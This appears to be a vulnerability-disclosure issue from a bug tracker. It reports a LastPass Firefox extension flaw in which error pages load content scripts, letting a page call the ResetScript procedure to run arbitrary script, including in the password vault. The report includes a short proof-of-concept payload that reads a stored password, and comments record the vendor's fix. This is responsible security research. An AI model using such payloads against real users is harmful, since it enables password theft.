New issue
Advanced search Search tips
Starred by 5 users

Issue metadata

Status: Fixed
Closed: May 2017

Sign in to add a comment

Issue 1217: LastPass: FireFox error pages still load Content Scripts, allowing access to ExtensionProxyService

Reported by, Mar 21 2017 Project Member

Issue description

The fix for  issue 1209  was to prevent loading the special domain ``. This works in Chrome, but FireFox loads content scripts into error pages, allowing a similar vulnerability to be exploited.

The list of procedure calls available is completely different, but I noticed that the procedure `ResetScript` will load an arbitrary URL, and then run arbitrary script in it.

This is effectively a UXSS, allowing anyone to compromise any website. But...because the URL being opened is from an extension, it can open non-websafe URLS, e.g. resource://support-at-lastpass-dot-com/data/vault.html. This allows a simple demo where your password can be read back from the vault, e.g.:

            type: "ResetScript",
            data: [
                    appId: 1,
                    url: "resource://support-at-lastpass-dot-com/data/vault.html",
                    appName: "exploit",
                    username: "root",
                    script: 'javascript:setTimeout(\'document.getElementsByClassName("itemButton edit")[1].click()\', 1000);' 
                        +   'setTimeout(\'alert(document.getElementById("siteDialogPassword").value)\',2000);'
                        +   'throw 1;'
        }, "*")

I uploaded a demo version here (this URL is secret):

It reliably alert()s the password for a random site in my vault.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Windows 7-2017-03-21-15-28-52.png
128 KB View Download

Comment 1 by, Mar 22 2017

Project Member
Labels: -Restrict-View-Commit
It looks like LastPass have released 4.1.36a which fixes this issue.

Firefox users should be automatically updated.

Thanks to LastPass for another super quick response.

Sidenote: I think it might be a Mozilla bug that neterror pages load content scripts, it feels unintentional. I'll file a low-priority bugzilla bug later today.

Comment 2 by, May 4 2017

Project Member
Status: Fixed (was: New)

Comment 3 Deleted

Sign in to add a comment